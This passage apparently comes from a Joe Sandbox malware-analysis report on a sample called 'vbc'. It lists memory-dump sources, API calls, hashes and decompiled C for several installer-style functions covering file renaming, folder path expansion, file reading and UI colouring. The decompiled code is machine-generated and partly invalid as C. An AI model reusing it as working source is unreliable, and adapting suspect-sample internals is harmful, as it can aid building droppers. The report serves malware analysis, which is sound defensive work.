SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
GlobalFree.KERNEL32(00000000), ref: 004062EB
CloseHandle.KERNEL32(00000000), ref: 004062F2

Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406053

Strings

%ls=%ls, xrefs: 004061F8
[Rename], xrefs: 0040626C, 0040627E

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D

Uniqueness

Uniqueness Score: -1.00%

Function 0040657A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x433edc - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x434f38 + _t44 * 2;
				_t45 = 0x432ea0;
				_t108 = 0x432ea0;
				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E0040653D(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x432ea0;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x436000;
								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
							} else {
								E00406484(_t108,  *0x434f08);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004067C4(_t108);
							}
							goto L38;
						}
						if( *0x434f84 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x434f04;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E0040657A(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}

0x0040657a
0x0040657a
0x0040657a
0x00406580
0x00406585
0x00406596
0x00406596
0x0040659e
0x0040659f
0x004065a0
0x004065a1
0x004065a4
0x004065ac
0x004065ae
0x004065bf
0x004065c2
0x004065c2
0x004065c6
0x004065cc
0x004065cf
0x004067aa
0x004067aa
0x004067b5
0x004067c1
0x004067c1
0x00000000
0x004065d5
0x004065da
0x004065ef
0x004065f0
0x004065f6
0x00406788
0x00406796
0x00406799
0x00406799
0x0040678a
0x0040678d
0x00406790
0x00406792
0x00406792
0x0040679b
0x0040679b
0x004067a1
0x004067a4
0x004065d7
0x00000000
0x004065d7
0x00000000
0x004067a4
0x004065fc
0x004065ff
0x0040660e
0x00406615
0x00406621
0x00406624
0x00406627
0x00406628
0x0040662d
0x00406633
0x00406636
0x00406639
0x0040672c
0x00406731
0x00406764
0x00406769
0x0040676e
0x00406773
0x00406773
0x00406778
0x0040677e
0x00406781
0x00000000
0x00406781
0x00406733
0x00406736
0x00406739
0x0040674e
0x00406755
0x0040673b
0x00406742
0x00406742
0x0040675d
0x00406760
0x00406724
0x00406725
0x00406725
0x00000000
0x00406760
0x00406646
0x0040664a
0x0040664a
0x0040664b
0x0040664d
0x0040668a
0x0040668d
0x0040669d
0x004066a0
0x004066a8
0x004066ae
0x004066ae
0x00406709
0x00406709
0x0040670b
0x00000000
0x00000000
0x004066b2
0x004066b7
0x004066b8
0x004066ba
0x004066d1
0x004066df
0x004066e5
0x004066e7
0x00406705
0x00406705
0x00406705
0x00000000
0x00406705
0x004066ed
0x004066f6
0x004066f9
0x004066ff
0x00406703
0x00000000
0x00000000
0x00000000
0x00406703
0x004066cb
0x004066cd
0x004066cf
0x00000000
0x00000000
0x00000000
0x004066cf
0x00000000
0x00406709
0x00406695
0x00000000
0x0040664f
0x0040666d
0x00406676
0x00406713
0x00406717
0x0040671f
0x0040671f
0x00000000
0x00406717
0x00406680
0x0040670d
0x00406711
0x00000000
0x00000000
0x00000000
0x00406711
0x0040664d
0x00000000
0x004065da

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll,00000000,00000000,00425A20,74EC110C), ref: 004066A8
lstrcatW.KERNEL32 ref: 0040671F
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll,00000000), ref: 00406779

Strings

Call, xrefs: 004065A4, 00406657, 0040665E, 00406662, 0040667F, 00406694, 004066A7, 004066BC, 004066E9, 0040671E, 00406724, 00406741, 00406754, 00406772, 00406778, 00406781, 004067B7
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406719
Skipped: C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll, xrefs: 0040659F
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406663

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-2745295900
Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00404500 Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x00404512
0x004045c8
0x00000000
0x004045c8
0x00404523
0x00404527
0x00000000
0x00404541
0x00404541
0x0040454a
0x00000000
0x00000000
0x0040454c
0x00404558
0x0040455b
0x0040455b
0x00404561
0x00404567
0x00404567
0x00404573
0x00404579
0x00404580
0x00404583
0x00404586
0x00404588
0x00404588
0x00404590
0x00404596
0x00404596
0x004045a0
0x004045a5
0x004045a8
0x004045ad
0x004045b0
0x004045b0
0x004045c0
0x004045c0
0x00000000
0x004045c3

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040451D
GetSysColor.USER32 ref: 0040455B
SetTextColor.GDI32(?,00000000), ref: 00404567
SetBkMode.GDI32(?,?), ref: 00404573
GetSysColor.USER32 ref: 00404586
SetBkColor.GDI32(?,?), ref: 00404596
DeleteObject.GDI32(?), ref: 004045B0
CreateBrushIndirect.GDI32(?), ref: 004045BA

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x004026ec
0x004026ee
0x004026f1
0x004026f3
0x004026f6
0x004026fb
0x004026ff
0x00402702
0x00402705
0x00402c2a
0x00402c2d
0x0040270b
0x0040270b
0x00402712
0x00402714
0x00402714
0x0040271a
0x0040287e
0x0040287e
0x00402881
0x00402886
0x004015b6
0x0040292e
0x0040292e
0x00000000
0x00402720
0x00402721
0x0040272c
0x0040272f
0x0040273b
0x0040273f
0x004027d7
0x004027ef
0x004027ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402745
0x00402745
0x00402748
0x00402749
0x0040274c
0x00402751
0x00402758
0x00402760
0x00000000
0x00402766
0x00402766
0x0040276b
0x00000000
0x00402771
0x00402771
0x00402779
0x0040277c
0x0040277f
0x0040283a
0x00402841
0x00402785
0x0040278b
0x00402797
0x00402801
0x00402801
0x00402799
0x00402799
0x0040279c
0x0040279e
0x0040279e
0x0040279e
0x004027a1
0x004027a6
0x004027a9
0x00000000
0x00000000
0x004027ab
0x004027ae
0x004027bc
0x004027c2
0x004027d0
0x00000000
0x004027d2
0x00000000
0x004027d2
0x00000000
0x004027d0
0x0040279e
0x00402804
0x00402807
0x00000000
0x00402809
0x0040280e
0x0040284f
0x00402871
0x00402878
0x0040285d
0x0040285d
0x00402860
0x00402863
0x00402866
0x00402866
0x00000000
0x00402817
0x00402817
0x0040281a
0x0040281d
0x00402823
0x00402827
0x0040282a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040282a
0x0040280e
0x00402807
0x0040277f
0x0040276b
0x00402760
0x00000000
0x0040282c
0x0040282c
0x0040282f
0x00402838
0x00000000
0x0040272f
0x0040271a
0x00402c33
0x00402c39

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004067C4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004067C4(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E83(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004067c6
0x004067cf
0x004067e6
0x004067e6
0x004067ed
0x004067f9
0x004067f9
0x004067fc
0x004067ff
0x00406804
0x00406806
0x0040680f
0x00406813
0x00406830
0x00406838
0x00406838
0x0040683d
0x0040683f
0x00406842
0x00406847
0x00406848
0x0040684c
0x0040684c
0x0040684d
0x00406854
0x00406856
0x0040685d
0x00000000
0x00000000
0x00406865
0x0040686b
0x00000000
0x00000000
0x00000000
0x0040686b
0x00406870

APIs

CharNextW.USER32(?), ref: 00406827
CharNextW.USER32(?), ref: 00406836
CharNextW.USER32(?), ref: 0040683B
CharPrevW.USER32(?,?), ref: 0040684E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004067C5
*?|<>/":, xrefs: 00406816

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3083651966
Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD

Uniqueness

Uniqueness Score: -1.00%

Function 00404E54 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404e62
0x00404e6f
0x00404e75
0x00404eb3
0x00404eb3
0x00404ec2
0x00404ec9
0x00000000
0x00404ecb
0x00404e77
0x00404e86
0x00404e8e
0x00404e91
0x00404ea3
0x00404ea9
0x00404eb0
0x00000000
0x00404eb0
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
GetMessagePos.USER32 ref: 00404E77
ScreenToClient.USER32(?,?), ref: 00404E91
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9

Strings

f, xrefs: 00404EA5

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
